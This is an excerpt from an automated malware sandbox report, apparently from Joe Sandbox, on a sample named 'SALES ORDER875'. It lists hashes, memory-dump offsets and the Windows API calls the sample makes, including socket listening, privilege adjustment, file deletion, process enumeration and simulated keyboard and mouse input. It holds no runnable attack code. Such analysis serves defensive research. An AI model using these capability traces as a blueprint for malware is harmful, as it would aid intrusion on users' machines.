                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                    • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                    • API String ID: 2234035333-3163812486
                                                                                                                                                                                    • Opcode ID: 23a2d2240a817bf177e6c4e53e627b08aa6565dcc0c0ed9be02bee07b980fbd9
                                                                                                                                                                                    • Instruction ID: d4c3e4bfb22f900faacdbbb4f5db0a1b6ac15e7af040a19a551ae11586a3add4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 23a2d2240a817bf177e6c4e53e627b08aa6565dcc0c0ed9be02bee07b980fbd9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 82017672A10235ABEB1122B69C86FFF329C9704340F164A22FC02E70D3E7B89C4081A4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006), ref: 00401276
                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00401283
                                                                                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 004012BA
                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 004012C5
                                                                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 004012F4
                                                                                                                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00401303
                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 0040130D
                                                                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 0040133C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 540024437-0
                                                                                                                                                                                    • Opcode ID: 26d10272660347b5cc14de6fe8a6cdd27b2ab4d13dedd61897f47c05460bb681
                                                                                                                                                                                    • Instruction ID: be226e7b814aab42d39435a10004be9cce4870cc089fff763539b842c87b5b86
                                                                                                                                                                                    • Opcode Fuzzy Hash: 26d10272660347b5cc14de6fe8a6cdd27b2ab4d13dedd61897f47c05460bb681
                                                                                                                                                                                    • Instruction Fuzzy Hash: 224181316002009FD710EF64C4C4B6ABBE5AF46318F1881ADE856AF3E2C775EC81CBA5
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00383AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00383A97,?,?,00382E7F,?,?,?,00000000), ref: 00383AC2
                                                                                                                                                                                      • Part of subcall function 003EE199: GetFileAttributesW.KERNEL32(?,003ECF95), ref: 003EE19A
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 003ED420
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 003ED470
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 003ED481
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 003ED498
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 003ED4A1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                                                                                                    • Opcode ID: fb988ed21780365e6ab40e114ab4304f5791bcab1fab1ed61233dfc4ad3ddf70
                                                                                                                                                                                    • Instruction ID: 2391e82ae8fb7f5afa2be999cc53f34569f8b80de91fd844b985a3dcb7fde3c6
                                                                                                                                                                                    • Opcode Fuzzy Hash: fb988ed21780365e6ab40e114ab4304f5791bcab1fab1ed61233dfc4ad3ddf70
                                                                                                                                                                                    • Instruction Fuzzy Hash: D03170310083959BC306FF65D8929AF77A8AEA1300F444A6EF4D1571D1EB30AA09CB67
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __floor_pentium4
                                                                                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                                                                                    • Opcode ID: f3ecd90b9dc0b41bcd8afcb60a8b0a60030c0c58600f9fcae1f47fb5e0f1ed64
                                                                                                                                                                                    • Instruction ID: f2d3c1bedd97e8b275036b8068872297f3480b9f6928e3939b7152f5a1955c61
                                                                                                                                                                                    • Opcode Fuzzy Hash: f3ecd90b9dc0b41bcd8afcb60a8b0a60030c0c58600f9fcae1f47fb5e0f1ed64
                                                                                                                                                                                    • Instruction Fuzzy Hash: A7C26D71E086288FDB26CF28DD407EAB7B9EB45309F1551EAD50DE7640E774AE818F40
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 003F64DC
                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 003F6639
                                                                                                                                                                                    • CoCreateInstance.OLE32(0041FCF8,00000000,00000001,0041FB68,?), ref: 003F6650
                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 003F68D4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                    • String ID: .lnk
                                                                                                                                                                                    • API String ID: 886957087-24824748
                                                                                                                                                                                    • Opcode ID: c596ac416a8e0e03c0b4dec4ed98ee5076d99324f138580e8de3637ea8453450
                                                                                                                                                                                    • Instruction ID: ff073cfbaac761615a4a4667c1522b42bf905670fc7088e41860a47739fc31ad
                                                                                                                                                                                    • Opcode Fuzzy Hash: c596ac416a8e0e03c0b4dec4ed98ee5076d99324f138580e8de3637ea8453450
                                                                                                                                                                                    • Instruction Fuzzy Hash: CFD17A71508301AFC305EF24C882A6BB7E9FF95704F10496DF5959B2A1EB30ED09CBA2
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 004022E8
                                                                                                                                                                                      • Part of subcall function 003FE4EC: GetWindowRect.USER32(?,?), ref: 003FE504
                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00402312
                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00402319
                                                                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00402355
                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00402381
                                                                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004023DF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2387181109-0
                                                                                                                                                                                    • Opcode ID: 3b30df619429f323476de6e6bb4d1127522f447dc17cf3e82b5b1390894883e0
                                                                                                                                                                                    • Instruction ID: ddf81aa868a48bb687f3dfdba6eba7c35e3eea4e5a040b9d7de9595d27852461
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b30df619429f323476de6e6bb4d1127522f447dc17cf3e82b5b1390894883e0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D31C172505315ABC721DF25CC49F9BBBA9FF84310F004A2AF985A71D1D778EA08CB96
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00389CB3: _wcslen.LIBCMT ref: 00389CBD
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 003F9B78
                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 003F9C8B
                                                                                                                                                                                      • Part of subcall function 003F3874: GetInputState.USER32 ref: 003F38CB
                                                                                                                                                                                      • Part of subcall function 003F3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003F3966
                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 003F9BA8
                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 003F9C75
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                    • API String ID: 1972594611-438819550
                                                                                                                                                                                    • Opcode ID: 900de64ae61d3bae400dd5d6c204c450160f66714154db9cc47aba5385b62dfb
                                                                                                                                                                                    • Instruction ID: 15ff308caf9381e315724da72faba587654a9e706f9c618c1cd4621520acfc7e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 900de64ae61d3bae400dd5d6c204c450160f66714154db9cc47aba5385b62dfb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 49415C7194420EABDF16EF64C985BEEBBB8EF05310F244096E905A6191EB309E84CF64
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$a51603e4e3035601bdcd1abc6bdd5f45edb301f6f098d161f70d59905
                                                                                                                                                                                    • API String ID: 0-598898970
                                                                                                                                                                                    • Opcode ID: cec0ff27dc00b0afab7c00561049da4a0f9d7b96b8f5c24660cd76c061cde3e0
                                                                                                                                                                                    • Instruction ID: 1704cb183278dfb7d9a142ba7af238152e17e1605941385218bf95f3ff500fe3
                                                                                                                                                                                    • Opcode Fuzzy Hash: cec0ff27dc00b0afab7c00561049da4a0f9d7b96b8f5c24660cd76c061cde3e0
                                                                                                                                                                                    • Instruction Fuzzy Hash: A4A2A075E0061ACBDF26DF58C841BADB7B1BF44310F6585AAE815E7680EB70AD81CF90
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00399BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00399BB2
                                                                                                                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00399A4E
                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00399B23
                                                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00399B36
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Color$LongProcWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3131106179-0
                                                                                                                                                                                    • Opcode ID: 1e500e7dc5470ea8364ee752c06be8d188343787385b768a5118c33209648960
                                                                                                                                                                                    • Instruction ID: 049c02a1656e09c4b7c76cb542bca2c153d652b1c6da57bfe14d8938e312711d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e500e7dc5470ea8364ee752c06be8d188343787385b768a5118c33209648960
                                                                                                                                                                                    • Instruction Fuzzy Hash: 90A13A72208504BFEF27AA3D9C99FBF269DDB46304B16411FF402C6BA2DA25DD41C276
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040304E: inet_addr.WSOCK32(?), ref: 0040307A
                                                                                                                                                                                      • Part of subcall function 0040304E: _wcslen.LIBCMT ref: 0040309B
                                                                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 0040185D
                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00401884
                                                                                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 004018DB
                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 004018E6
                                                                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 00401915
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1601658205-0
                                                                                                                                                                                    • Opcode ID: 3b5a494066dd5aaf9931d72b3a3181557a6255fca63b547a2991c6565dfdbb46
                                                                                                                                                                                    • Instruction ID: c6ed9cd4348d29a162ce94f58debee43832b32b51f36a88eb898e492665939a0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b5a494066dd5aaf9931d72b3a3181557a6255fca63b547a2991c6565dfdbb46
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7519271A00200AFEB11BF24C886F6A77E5AB45718F14C499FA156F3D3C775AD41CBA1
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 292994002-0
                                                                                                                                                                                    • Opcode ID: b646fe5e84cbba4cafd59db087d3da7746d1e521d5f0cd139fdf6e9da5694b0b
                                                                                                                                                                                    • Instruction ID: e3093b3e5dbb0a3307eae643f8b9435c804b7e3bf2d0f58d23df09e0e88f381b
                                                                                                                                                                                    • Opcode Fuzzy Hash: b646fe5e84cbba4cafd59db087d3da7746d1e521d5f0cd139fdf6e9da5694b0b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2721D6317802115FE7208F1AD884B9B7BA5EF95354F18806EE946CB361D775EC82CBD8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003E82AA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                                                    • String ID: ($tbD$|
                                                                                                                                                                                    • API String ID: 1659193697-3216404367
                                                                                                                                                                                    • Opcode ID: f15e509e8e51cec97b70d78eadb537b2a1ba6348b4d15d9982129d2342097128
                                                                                                                                                                                    • Instruction ID: cd2f6e980b6f9b40e00bd9d33cecfb1949c2352ef160369e68a75fdb394fdcd9
                                                                                                                                                                                    • Opcode Fuzzy Hash: f15e509e8e51cec97b70d78eadb537b2a1ba6348b4d15d9982129d2342097128
                                                                                                                                                                                    • Instruction Fuzzy Hash: CF323578A007559FCB29CF1AC480A6AB7F0FF48710B15C56EE59ADB7A1EB70E941CB40
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0040A6AC
                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040A6BA
                                                                                                                                                                                      • Part of subcall function 00389CB3: _wcslen.LIBCMT ref: 00389CBD
                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0040A79C
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040A7AB
                                                                                                                                                                                      • Part of subcall function 0039CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,003C3303,?), ref: 0039CE8A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1991900642-0
                                                                                                                                                                                    • Opcode ID: 4a3d840d509cc4069c8fee27b28bd1811d99f7608161592966215fd671c5350a
                                                                                                                                                                                    • Instruction ID: f52ec93d5c6ca65794c713fbf7b64e0cb30730f2a3f8fed918f306edbda75db9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a3d840d509cc4069c8fee27b28bd1811d99f7608161592966215fd671c5350a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D515071508301AFD711EF24C886E6BBBE8FF89754F40896EF5859B291EB30D904CB92
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 003EAAAC
                                                                                                                                                                                    • SetKeyboardState.USER32(00000080), ref: 003EAAC8
                                                                                                                                                                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 003EAB36
                                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 003EAB88
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                                                    • Opcode ID: 5a564e8148b7990212fc597233d3a9f52291f8be6f3baf8e5b6a94c34abd0eac
                                                                                                                                                                                    • Instruction ID: 84ccb8bda28c48e3ab17cdfb11b4fdbd1f069bc6b0e44ffefefa83e1e12fdf7f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a564e8148b7990212fc597233d3a9f52291f8be6f3baf8e5b6a94c34abd0eac
                                                                                                                                                                                    • Instruction Fuzzy Hash: 46312E30A40BA9AEFF36CB66CC05BFA77AAAB54310F04431AF181961D1D3B4A985C756
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 003BBB7F
                                                                                                                                                                                      • Part of subcall function 003B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,003BD7D1,00000000,00000000,00000000,00000000,?,003BD7F8,00000000,00000007,00000000,?,003BDBF5,00000000), ref: 003B29DE
                                                                                                                                                                                      • Part of subcall function 003B29C8: GetLastError.KERNEL32(00000000,?,003BD7D1,00000000,00000000,00000000,00000000,?,003BD7F8,00000000,00000007,00000000,?,003BDBF5,00000000,00000000), ref: 003B29F0
                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32 ref: 003BBB91
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,?,0045121C,000000FF,?,0000003F,?,?), ref: 003BBC09
